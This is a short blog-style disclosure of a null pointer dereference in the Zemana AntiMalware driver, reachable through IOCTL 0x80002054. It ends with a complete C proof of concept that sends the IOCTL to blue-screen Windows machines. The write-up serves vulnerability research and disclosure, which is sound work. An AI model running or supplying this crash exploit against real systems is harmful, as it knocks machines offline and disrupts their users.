So I found a bug in Zemana AntiMalware version 188.8.131.52! It was kinda cool because this is my first time finding a bug in software that doesn’t have any type of exploits…that I saw at the time. The bug is a null pointer dereference, and the null page never gets called into in any way, so unfortunately no privesc was possible, blehhh. I wish though! It affects Windows 7 and up, both 32 and 64 bit systems.
To trigger this, send IOCTL code 0x80002010 or 0x80002054 to the driver.
When you allocate a page using 0x80002010, nothing amazing happens; it just errors out. When you allocate a page using 0x80002054, you can allocate your own null page!
Unfortunately, our allocated page never gets called, so nothing happens: 0x11e gets put into ESI, which overwrites where our page lies. Freaking A. I tried to see if I could get code exec anyway, knowing full well it would not be fruitful…for science, but failed regardless. Eh, oh well!
I sent an email out to the CVE peeps and the vendor and found out a pimp named Parvez Anwar beat me to the bug! Nicely done! The weird thing was that it wasn’t for Zemana. It was for Watchdog Anti-malware. The interesting part is that Watchdog Anti-malware also uses the same drivers as Zemana. Same looking GUI, same drivers, same IOCTL codes, and same BSoDs. Interestiiiing…anyways! There are no print statements in my PoC because nothing really gets printed once a blue screen is triggered. Here is a PoC to blue screen the machine:
#include <windows.h>
#define Driver_Name L"\\\\.\\ZemanaAntiMalware"
#define Ioctl_Code 0x80002054
int main(void)
{
    // Grab handle to driver (CreateFileW, since Driver_Name is a wide string)
    HANDLE Driver = CreateFileW(Driver_Name, GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    if (Driver == INVALID_HANDLE_VALUE)
        return 1; // driver not present or not reachable from this context
    // Send the IOCTL with a NULL input buffer. Watch the machine go poof!
    LPVOID lpInBuffer = 0;
    DWORD bytesReturned = 0;
    BOOL didItWork = DeviceIoControl(Driver, Ioctl_Code, lpInBuffer, 0,
        NULL, 0, &bytesReturned, NULL);
    CloseHandle(Driver);
    return didItWork ? 0 : 1;
}